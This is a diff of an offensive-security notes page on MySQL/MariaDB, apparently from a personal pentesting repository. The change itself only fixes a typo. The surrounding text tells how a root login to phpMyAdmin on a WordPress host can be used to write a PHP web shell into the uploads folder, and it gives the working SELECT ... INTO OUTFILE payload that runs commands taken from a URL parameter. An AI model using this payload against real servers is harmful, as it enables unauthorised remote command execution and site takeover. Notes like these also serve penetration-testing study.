amandaguglieri/hackinglife/docs/3306-mariadb-mysql.md

 ## Upload a shell

 Take a wordpress installation that uses a mysql database.
-If you manage to login into the mysql pannel (/phpmyadmin) as root then you could upload a php shell to the /wp-content/uploads/ folder.
+If you manage to login into the mysql panel (/phpmyadmin) as root then you could upload a php shell to the /wp-content/uploads/ folder.

 ```mysql
 Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";